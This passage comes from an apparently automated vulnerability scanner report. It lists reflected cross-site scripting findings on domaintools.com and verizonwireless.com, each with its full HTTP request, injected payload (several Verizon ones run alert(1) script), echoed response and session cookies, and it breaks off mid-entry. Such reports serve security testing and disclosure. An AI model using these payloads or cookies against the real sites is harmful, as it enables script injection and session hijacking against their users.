Content-Length: 12147
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=reverse-whois7831a"><a>e8224b58c1f">
...[SNIP]...

3.171. http://www.domaintools.com/research/reverse-whois/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/reverse-whois/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ad1dd<a>b098f8c0d3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/ad1dd<a>b098f8c0d3c/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:29 GMT
Content-Length: 12022
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>b098f8c0d3c">Whois record for "ad1dd<a>b098f8c0d3c"</a>
...[SNIP]...

3.172. http://www.domaintools.com/research/whois-applications/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/whois-applications/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddbad"><a>45bf58e5a7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/whois-applicationsddbad"><a>45bf58e5a7c/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:15 GMT
Content-Length: 12175
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=whois-applicationsddbad"><a>45bf58e5a7c">
...[SNIP]...

3.173. http://www.domaintools.com/research/whois-applications/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/whois-applications/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a0ea<a>e87b973b6c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/5a0ea<a>e87b973b6c8/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:25 GMT
Content-Length: 12022
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>e87b973b6c8">Whois record for "5a0ea<a>e87b973b6c8"</a>
...[SNIP]...

3.174. http://www.domaintools.com/research/whois-history/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/whois-history/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 570f6<a>08d0a1716c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/570f6<a>08d0a1716c/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:02 GMT
Content-Length: 12014
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>08d0a1716c">Whois record for "570f6<a>08d0a1716c"</a>
...[SNIP]...

3.175. http://www.domaintools.com/research/whois-history/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/whois-history/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fab1"><a>1aeb2533809 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/whois-history6fab1"><a>1aeb2533809/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:08:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:08:50 GMT
Content-Length: 12147
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=whois-history6fab1"><a>1aeb2533809">
...[SNIP]...

3.176. http://www.domaintools.com/sitemap/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /sitemap/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ba9"><a>3cdf8fa2103 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitemapd4ba9"><a>3cdf8fa2103/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:07 GMT
Content-Length: 12085
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=sitemapd4ba9"><a>3cdf8fa2103">
...[SNIP]...

3.177. http://www.domaintools.com/sitemap/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /sitemap/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48f91<a>4a8c5c03304 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitemap48f91<a>4a8c5c03304/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:17 GMT
Content-Length: 12064
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>4a8c5c03304">Whois record for "sitemap48f91<a>4a8c5c03304"</a>
...[SNIP]...

3.178. http://www.verizonwireless.com/b2c/shoppingAssistant [closeUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The value of the closeUrl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ac2b'%3balert(1)//5aadb58b643 was submitted in the closeUrl parameter. This input was echoed as 5ac2b';alert(1)//5aadb58b643 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=1&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue5ac2b'%3balert(1)//5aadb58b643 HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204729|session#1310993870949-319721#1310996989|check#true#1310995189; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:03 GMT
Pragma: no-cache
Content-Length: 8020
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
   <title>Shopping Cart</title>
   

                   
...[SNIP]...
window.location='/b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst'+'&displayText=Phone&closeUrl='+escape('/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&backTo=true5ac2b';alert(1)//5aadb58b643');
        } else if (data.nextStep == 'bogo'){
           
           window.location='/b2c/shoppingAssistant?step=bogo&item=phoneFirst&phoneID=5632';
               }
       }
       });
   
   
}
</sc
...[SNIP]...

3.179. http://www.verizonwireless.com/b2c/shoppingAssistant [displayText parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The value of the displayText request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0b8a"-alert(1)-"52dbce692bd was submitted in the displayText parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst&displayText=Phoned0b8a"-alert(1)-"52dbce692bd&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=1&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312206231|session#1310993870949-319721#1310998491|check#true#1310996691; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:05 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 15106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- Main JSP for the new shopping Assistant -->


<html xmlns="http://www.w3.org/1
...[SNIP]...
<script type="text/javascript">
           addLoadEvent(setButtons);
           addLoadEvent(png_init);
           
           var currentSA="/b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst&displayText=Phoned0b8a"-alert(1)-"52dbce692bd&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue";
           function continueToPlan() {
           
                    phoneFirst.continueToPlan('phoneFirst', funct
...[SNIP]...

3.180. http://www.verizonwireless.com/b2c/shoppingAssistant [hasMultipleAssociatedSimTOs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The value of the hasMultipleAssociatedSimTOs request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 34aa8%3balert(1)//3e4ef288914 was submitted in the hasMultipleAssociatedSimTOs parameter. This input was echoed as 34aa8;alert(1)//3e4ef288914 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=1&hasMultipleAssociatedSimTOs=false34aa8%3balert(1)//3e4ef288914&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204729|session#1310993870949-319721#1310996989|check#true#1310995189; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:03 GMT
Pragma: no-cache
Content-Length: 8019
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
   <title>Shopping Cart</title>
   

                   
...[SNIP]...
<script type="text/javascript">
   function continueshopping() {

   
           phoneFirst.addPhone('phoneFirst',5632,1 ,false34aa8;alert(1)//3e4ef288914, function(data) {
       if(data.result){

           if(data.nextStep == 'serverError'){
               $('setError').set('html',data.errorMessage);
                   overlay.passFrameSize();
               document.locati
...[SNIP]...

3.181. http://www.verizonwireless.com/b2c/shoppingAssistant [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb600"-alert(1)-"8e3e52beae3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst&displayText=Phone&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue&cb600"-alert(1)-"8e3e52beae3=1 HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=1&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312206231|session#1310993870949-319721#1310998491|check#true#1310996691; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:10 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 15118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- Main JSP for the new shopping Assistant -->


<html xmlns="http://www.w3.org/1
...[SNIP]...
       var currentSA="/b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst&displayText=Phone&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue&cb600"-alert(1)-"8e3e52beae3=1";
           function continueToPlan() {
           
                    phoneFirst.continueToPlan('phoneFirst', function(data) {
            if(data.result){
            // alert("called");
               if(window.parent.location){

...[SNIP]...

3.182. http://www.verizonwireless.com/b2c/shoppingAssistant [phoneID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The value of the phoneID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c68ab%3balert(1)//0c4b84ca3ab was submitted in the phoneID parameter. This input was echoed as c68ab;alert(1)//0c4b84ca3ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632c68ab%3balert(1)//0c4b84ca3ab&quantity=1&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204729|session#1310993870949-319721#1310996989|check#true#1310995189; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:02 GMT
Pragma: no-cache
Content-Length: 8100
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
   <title>Shopping Cart</title>
   

                   
...[SNIP]...
<script type="text/javascript">
   function continueshopping() {

   
           phoneFirst.addPhone('phoneFirst',5632c68ab;alert(1)//0c4b84ca3ab,1 ,false, function(data) {
       if(data.result){

           if(data.nextStep == 'serverError'){
               $('setError').set('html',data.errorMessage);
                   overlay.passFrameSize();
               docume
...[SNIP]...

3.183. http://www.verizonwireless.com/b2c/shoppingAssistant [quantity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

